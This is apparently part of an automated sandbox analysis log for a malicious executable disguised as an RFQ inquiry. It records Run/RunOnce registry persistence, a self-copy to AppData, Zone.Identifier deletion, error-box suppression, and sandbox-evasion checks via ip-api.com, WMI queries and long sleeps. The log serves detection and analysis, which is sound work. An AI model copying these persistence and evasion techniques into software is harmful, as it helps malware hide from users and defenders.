            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TekstrkkerneJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyedJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodelJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\IagttogesJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Iagttoges\aerostatics.OxfJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Iagttoges\Unlevelly211Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Iagttoges\Unlevelly211\Nagede.plaJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Iagttoges\Unlevelly211\Icework.RenJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Iagttoges\Unlevelly211\Overmobilized.tidJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Iagttoges\Unlevelly211\beglerbeg.txtJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\IntensifiesJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies\flittigstes.cauJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies\kaprers.xenJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies\magistratordninger.temJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies\padpiece.misJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies\regurgitative.artJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies\silverers.vilJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TekstrkkerneJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TekstrkkerneJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TekstrkkerneJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TekstrkkerneJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorersJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorersJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeMemory allocated: 37BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeMemory allocated: 39BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 37DD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 37C30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFB67.tmp\System.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn397A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe TID: 4636Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe TID: 4636Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe TID: 2888Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe TID: 2888Thread sleep time: -600000s >= -30000sJump to behavior
